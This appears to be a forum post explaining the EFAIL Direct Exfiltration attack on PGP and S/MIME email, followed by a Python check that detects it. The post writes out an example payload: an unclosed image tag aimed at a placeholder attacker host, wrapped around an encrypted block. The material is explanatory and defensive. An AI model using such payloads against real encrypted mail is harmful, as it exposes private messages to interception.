- @Hans W mentioned the EFAIL vulnerabilities in the end-to-end encryption technologies OpenPGP and S/MIME, which allow an attacker to capture the plaintext of encrypted emails.
- There are two types of EFAIL exploits, Direct Exfiltration and CBC/CFB Gadget Attack. This article only addresses the Direct Exfiltration exploit.
- The Direct Exfiltration attack exploits the way email clients handle externally requested HTML objects, such as graphics and styles, immediately following decryption.
- The attacker injects an HTML statement requesting the external object, with the start tag and end tag straddling the encrypted body of the email.
- Example using a graphic request:
- <img src="http***cheaptrick.gif"
- -----BEGIN PGP MESSAGE-----
- Version: PGP Personal Security 7.0.3
- Encrypted Block of Text
- -----END PGP MESSAGE-----
- ">
- Immediately following decryption, the email client requests the external graphic and all the decrypted information between the tags is sent to and captured by the attacker.
- The simplicity of the exploit allows the attacker to inject the code into any detected encrypted email.
- On 29 May 2018, the EFF published "How To Turn PGP Back On As Safely As Possible". Using Thunderbird 52.8 with the Enigmail 2.0.6 plugin, or later versions, provides a measure of security. Read the entire article for settings and recommended methods to protect your privacy.
- Some of the more obvious mitigating measures should be closely evaluated. All email clients should be evaluated for their ability to mitigate this exploit.
- I plan to post other articles covering the CBC/CFB Gadget Attack and mitigation methods.
- These are the primary sources for this article. Be sure to review the links for more information and mitigating measures.
- EFAIL.DE
- PGP and EFAIL: Frequently Asked Questions
- I welcome any corrections, comments, and thoughts.
- EFAIL #Encryption #Decryption #Attack #Exploit #Vulnerability #PGP #S/MIME #OpenPGP #GPG #Email #EFF #Thunderbird #Enigmail
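
A defensive check for the Direct Exfiltration layout described above, as an added example that is not part of the original post: it flags mail in which an HTML tag is still open when an armored PGP block begins. It also joins MIME parts in order, which goes beyond the single-body layout shown in the article; the function names and both sample messages are constructed for illustration.

```python
import re
from email import message_from_string

ARMOR = re.compile(r"-----BEGIN PGP MESSAGE-----.*?-----END PGP MESSAGE-----", re.S)
# An HTML start tag that has been opened but has no closing '>' yet.
OPEN_TAG = re.compile(r"<[A-Za-z][^<>]*\Z")

def rendered_text(raw_email):
    """Join all leaf MIME parts in order, roughly what a client renders as one document."""
    chunks = []
    for part in message_from_string(raw_email).walk():
        if part.is_multipart():
            continue
        data = part.get_payload(decode=True) or b""
        chunks.append(data.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)

def find_straddled_blocks(raw_email):
    """Return the unterminated tag in front of each armored block, if there is one."""
    text = rendered_text(raw_email)
    hits = (OPEN_TAG.search(text[:b.start()]) for b in ARMOR.finditer(text))
    return [h.group(0).strip() for h in hits if h]

# Constructed sample in the layout shown in the article (its placeholder URL and body).
SUSPECT = '''Content-Type: text/html

<img src="http***cheaptrick.gif"
-----BEGIN PGP MESSAGE-----
Version: PGP Personal Security 7.0.3
Encrypted Block of Text
-----END PGP MESSAGE-----
">
'''

# Constructed sample: armored block between complete tags, nothing left open.
BENIGN = '''Content-Type: text/html

<p>Encrypted note follows.</p>
-----BEGIN PGP MESSAGE-----
Encrypted Block of Text
-----END PGP MESSAGE-----
<p>Regards</p>
'''

if __name__ == "__main__":
    for name, raw in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, find_straddled_blocks(raw))
```

A hit is a reason to quarantine or strip the HTML before the message reaches a client that decrypts automatically; an empty result only means this particular layout was not found.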